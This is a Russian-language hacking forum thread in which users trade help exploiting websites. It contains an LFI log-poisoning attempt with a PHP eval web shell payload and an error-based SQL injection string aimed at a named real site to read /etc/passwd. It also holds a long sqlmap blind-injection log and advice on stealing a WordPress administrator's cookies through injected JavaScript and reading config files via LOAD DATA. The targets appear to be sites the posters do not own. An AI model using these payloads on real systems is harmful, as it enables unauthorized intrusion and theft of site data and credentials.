Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. Octavian

    Octavian Elder - Старейшина

    Joined:
    8 Jul 2015
    Messages:
    506
    Likes Received:
    101
    Reputations:
    25
    Типа URL ENCODE explorerне делает
     
  2. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    683
    Likes Received:
    1,513
    Reputations:
    460
    типа да, не энкодит
     
  3. Octavian

    Octavian Elder - Старейшина

    Joined:
    8 Jul 2015
    Messages:
    506
    Likes Received:
    101
    Reputations:
    25
    А в MOZILLA?
     
  4. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    683
    Likes Received:
    1,513
    Reputations:
    460
    А в мозилла энкодит и ничего с этим не поделаешь!
     
  5. Octavian

    Octavian Elder - Старейшина

    Joined:
    8 Jul 2015
    Messages:
    506
    Likes Received:
    101
    Reputations:
    25
    Почему это делается в даном случае ? ведь есть работающие GET XSS в Chrome, Mozilla
     
  6. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    683
    Likes Received:
    1,513
    Reputations:
    460
    eminlayer7788, Gorev and Octavian like this.
  7. billybonse

    billybonse Member

    Joined:
    9 Oct 2011
    Messages:
    55
    Likes Received:
    7
    Reputations:
    1
    Привет всем читающим.
    Нужна помощь. (Сразу извиняюсь, если задаю глупый вопрос)
    Нашел lfi, пытаюсь раскрутить.

    /proc/self/environ не работает
    cmdline - /usr/sbin/httpd
    В httpd.conf:
    httpd.conf - ErrorLog logs/error_log
    Перебирал различные пути, не нашел

    Попробовал так:
    GET /epicfaaaaaail.php?<?php eval($_GET[cmd])?>
    Обращаюсь - /proc/self/fd/8%00&cmd=ls%00
    Выдает что-то странное:
    PHP Fatal error: Call to undefined function: getsubtitle() in /local/.../index.php on line 20
    [error] [client x.x.x.x] File does not exist: /local/.../robots.txt
    [error] [client x.x.x.x] File does not exist: /local/.../nonlinear
    [error] [client x.x.x.x] File does not exist: /local/.../nonlinear
    PHP Fatal error: Call to undefined function: getsubtitle() in /local/.../index.php on line 20

    В каком направлении копать?
     
  8. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    683
    Likes Received:
    1,513
    Reputations:
    460
    Пейлод нужно в юзерагенте передавать. Так же, можно попробовать подцепить сессию и посмотреть что туда можно загнать.

    https://rdot.org/forum/showthread.php?t=343 много полезной инфы на тему.

    Нулл байт не нужен.
     
    #2068 crlf, 20 Sep 2017
    Last edited: 20 Sep 2017
    billybonse and erwerr2321 like this.
  9. billybonse

    billybonse Member

    Joined:
    9 Oct 2011
    Messages:
    55
    Likes Received:
    7
    Reputations:
    1
    В соседней статье:
    "Ты пишешь мини шелл: <?php eval($_GET[cmd])?>, кодируешь всё в url, составляешь и отправляешь пакет:
    POST httр://localhost/epicfaaaaaail.php?%3C%3Fphp+eval%28%24_GET%5Bcmd%5D%29%3F%3E HTTP/1.1
    Host: localhost

    А кто? Кто это сделал? Сервер, приняв и обработав запрос, выдает 404 ошибку (о несуществующей страницы epicfaaaaaail.php), и записал это в error_log, выглядеть на сервере это стало так:
    Code:
    127.0.0.1 - [29/Sep/2010:13:55:36 -0700] "GET /epicfaaaaaail.php?<?php eval($_GET[cmd])?> HTTP/1.1" 404 2326
    т.е. получается, обратившись к этому логу, PHP интерпретатор обработает всё до <?phpкак обычный текст, всё что внутри eval($_GET[cmd]) как PHP код, и всё что после?>как обычный текст, а значит всё, шелл есть. Ты обращаешься к error_log: httр://localhost/?page=../../../etc/httpd/log/error_log&cmd=phpinfo();die(); и ничуть не удивившись видишь результат выполнения phpinfo()."

    Для сессии нужна рега, если я не ошибаюсь, которой здесь нет.
     
  10. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    683
    Likes Received:
    1,513
    Reputations:
    460
    Статью нужно перечитать ещё раз и подробно изучить тему по ссылке, которую я дал выше. У вас получилась мешанина из методов эксплуатации (procfs != логи).

    Не обязательно.
     
    panic.ker and billybonse like this.
  11. Muracha

    Muracha Member

    Joined:
    30 Jul 2011
    Messages:
    153
    Likes Received:
    10
    Reputations:
    0
    Есть доступ к базе данных на которой крутится малоинтересная база данных без возможности записи файла и каких-либо прав. Максимум что я смог сделать - это встроить джаву, создавать некоторые html формы и выводить их на страницу с расширением .php

    На другой БД, в каталоге /blog/ крутиться worpdress.
    Можно ли создать форму html используя javascript - чтобы прочитать внутренний файл config.php - и вообще, как прочитать этот файл при отсутствии прав на чтение и запись?(я бы давно залил шелл, но нет)
    Могу дать доступ, и если поможете - отблагодарю чисто символически.

    Помимо этого там есть самодельная фотогалерея, которая обращается к базе данных за именем файла. Сам файл лежит на сервере...
    Можно наверное как-то подделать имя файлы, чтобы скрипт загрузил посторонний файл? Может были у кого подобные задачи или статьи на эту тему?
     
    #2071 Muracha, 26 Sep 2017
    Last edited: 26 Sep 2017
  12. zifus

    zifus Member

    Joined:
    15 Aug 2015
    Messages:
    85
    Likes Received:
    11
    Reputations:
    0
    Посмотри в сторону load data local infile
     
    Muracha likes this.
  13. blackbox

    blackbox Elder - Старейшина

    Joined:
    31 Dec 2011
    Messages:
    362
    Likes Received:
    62
    Reputations:
    11
    Тебе уже ответили https://dev.mysql.com/doc/refman/5.7/en/load-data.html но тут нужно знать полный путь к файлу, поэтому нужна еще ошибка раскрытия путей, с галереей может не получится, нужно смотреть каким образом она отображает картинку, скорее всего там будет проверка на то является ли файл корректным изображением. Если ты можешь встраивать JS в страницу, то можно попробовать угнать куки администратора сайта, правда я не знаю как там в Wordpess с этим дела обстоят сейчас.
     
  14. WallHack

    WallHack Elder - Старейшина

    Joined:
    18 Jul 2013
    Messages:
    306
    Likes Received:
    138
    Reputations:
    33
    Была уязвимость error based, так крутил: seo-fast.ru/news'or(extractvalue(null,concat(0x3a,substr(load_file(0x2f6574632f706173737764),-30,30))))=
    Сейчас вывод ошибок отключен, но думаю там сейчас time based blind, помогите проверить.
     
  15. slipknot13

    slipknot13 New Member

    Joined:
    14 Oct 2017
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    как таблицы открыть
    [19:41:45] [INFO] fetching current database
    [19:41:45] [INFO] fetching tables for database: 'имя базы'
    [19:41:45] [INFO] fetching number of tables for database 'имя базы'
    [19:41:45] [PAYLOAD] 14 AND ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table_name) AS
    CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x657863656c746f
    6b656e),1,1))>66
    [19:41:45] [PAYLOAD] 14 AND ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table_name) AS
    CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x657863656c746f
    6b656e),1,1))>52
    [19:41:46] [PAYLOAD] 14 AND ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table_name) AS
    CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x657863656c746f
    6b656e),1,1))>48
    [19:41:46] [PAYLOAD] 14 AND ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table_name) AS
    CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x657863656c746f
    6b656e),1,1))>1
    [19:41:47] [INFO] retrieved:
    [19:41:47] [DEBUG] performed 4 queries in 1.62 seconds
    [19:41:47] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
    _name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
    3656c746f6b656e),1,1))>66),SLEEP(10),9830)
    [19:41:47] [WARNING] (case) time-based comparison requires larger statistical mo
    [19:41:47] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
    _name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
    3656c746f6b656e),1,1))>170454),SLEEP(10),9830)
    .
    [19:41:47] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
    _name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
    3656c746f6b656e),1,1))>819325),SLEEP(10),9830)
    .
    [19:41:47] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
    _name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
    3656c746f6b656e),1,1))>261031),SLEEP(10),9830)
    .
    [19:41:48] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
    _name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
    3656c746f6b656e),1,1))>164592),SLEEP(10),9830)
    .
    [19:41:48] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
    _name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
    3656c746f6b656e),1,1))>160487),SLEEP(10),9830)
    .
    [19:41:49] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
    _name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
    3656c746f6b656e),1,1))>871054),SLEEP(10),9830)
    .
    [19:41:50] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
    _name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
    3656c746f6b656e),1,1))>913561),SLEEP(10),9830)
    .
    [19:41:50] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
    _name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
    3656c746f6b656e),1,1))>478526),SLEEP(10),9830)
    .
    [19:41:51] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
    _name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
    3656c746f6b656e),1,1))>192387),SLEEP(10),9830)
    .
    [19:41:51] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
    _name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
    3656c746f6b656e),1,1))>330357),SLEEP(10),9830)
    .
    [19:41:52] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
    _name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
    3656c746f6b656e),1,1))>385436),SLEEP(10),9830)
    .
    [19:41:52] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
    _name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
    3656c746f6b656e),1,1))>145149),SLEEP(10),9830)
    .
    [19:41:53] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
    _name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
    3656c746f6b656e),1,1))>823404),SLEEP(10),9830)
    .
    [19:41:53] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
    _name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
    3656c746f6b656e),1,1))>142557),SLEEP(10),9830)
    .
    [19:41:54] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
    _name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
    3656c746f6b656e),1,1))>848401),SLEEP(10),9830)
    .
    [19:41:54] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
    _name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
    3656c746f6b656e),1,1))>487756),SLEEP(10),9830)
    .
    [19:41:55] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
    _name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
    3656c746f6b656e),1,1))>840171),SLEEP(10),9830)
    .
    [19:41:55] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
    _name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
    3656c746f6b656e),1,1))>800333),SLEEP(10),9830)
    .
    [19:41:56] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
    _name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
    3656c746f6b656e),1,1))>899978),SLEEP(10),9830)
    .
    [19:41:56] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
    _name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
    3656c746f6b656e),1,1))>502795),SLEEP(10),9830)
    .
    [19:41:57] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
    _name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
    3656c746f6b656e),1,1))>128986),SLEEP(10),9830)
    .
    [19:41:57] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
    _name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
    3656c746f6b656e),1,1))>227072),SLEEP(10),9830)
    .
    [19:41:57] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
    _name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
    3656c746f6b656e),1,1))>648363),SLEEP(10),9830)
    .
    [19:41:58] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
    _name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
    3656c746f6b656e),1,1))>656500),SLEEP(10),9830)
    .
    [19:41:58] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
    _name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
    3656c746f6b656e),1,1))>280401),SLEEP(10),9830)
    .
    [19:41:59] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
    _name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
    3656c746f6b656e),1,1))>721896),SLEEP(10),9830)
    .
    [19:41:59] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
    _name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
    3656c746f6b656e),1,1))>769715),SLEEP(10),9830)
    .
    [19:41:59] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
    _name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
    3656c746f6b656e),1,1))>689458),SLEEP(10),9830)
    .
    [19:42:00] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
    _name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
    3656c746f6b656e),1,1))>747115),SLEEP(10),9830)
    .
    [19:42:00] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
    _name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
    3656c746f6b656e),1,1))>103578),SLEEP(10),9830)
    . (done)
    [19:42:01] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
    _name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
    3656c746f6b656e),1,1))>52),SLEEP(10),9830)
    [19:42:01] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
    _name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
    3656c746f6b656e),1,1))>48),SLEEP(10),9830)
    [19:42:02] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
    _name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
    3656c746f6b656e),1,1))>1),SLEEP(10),9830)
    [19:42:02] [INFO] retrieved:
    [19:42:02] [DEBUG] performed 4 queries in 15.59 seconds
    [19:42:02] [WARNING] unable to retrieve the number of tables for database 'excel
    token'
    [19:42:02] [ERROR] unable to retrieve the table names for any database
    do you want to use common table existence check? [y/N/q] n
    [19:42:09] [CRITICAL] unable to retrieve the tables in database 'exceltoken'

    [*] shutting down at 19:42:09
     
  16. Octavian

    Octavian Elder - Старейшина

    Joined:
    8 Jul 2015
    Messages:
    506
    Likes Received:
    101
    Reputations:
    25
    Как в акунетикс настроить скан без тестирование повторяющихся страниц index.php?id=1, index.php?id=2, index.php?id=3
     
  17. karkajoi

    karkajoi Well-Known Member

    Joined:
    26 Oct 2016
    Messages:
    488
    Likes Received:
    459
    Reputations:
    8
    Добрый вечер, вопрос уже задавал не могу найти где мне ответили, вообщем, какой запрос чтоб вывести перечень соседних БД при sql inject?
     
  18. BadBoris

    BadBoris New Member

    Joined:
    17 Oct 2017
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Всем привет!
    Недавно обнаружил, что есть доступ к моим БД извне: nauchniestati.ru/phpmyadmin/
    Насколько это опасно? Как это исправить?
    Там ещё какие-то ошибки в файлах
    ./../php/php-gettext/streams.php
    ./../php/php-gettext/gettext.php

    Кто-нибудь может помочь?
     
  19. Octavian

    Octavian Elder - Старейшина

    Joined:
    8 Jul 2015
    Messages:
    506
    Likes Received:
    101
    Reputations:
    25
    Интересует возможность SQL Injection при такои фильтрацыии
    Code:
    function mssql_custom_escape($str, $trim = true, $encode = true) {
        if(get_magic_quotes_gpc()) {
            $str = stripslashes($str);
        }
        if ($trim) $str = trim($str);
        if ($encode) $str = htmlspecialchars($str);
    
        return preg_replace("#'#", "''", $str);
    }
     
  20. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    Если запрос что то типо:
    то как вариант вывод при уязвимом параметре не обремененном кавычками
    т.е получается как SQLI можно разкрутить, второй пример как вариант обремененными кавычками:
    т.е можно разкрутить как ErrorBased
     
    _________________________
    Octavian and panic.ker like this.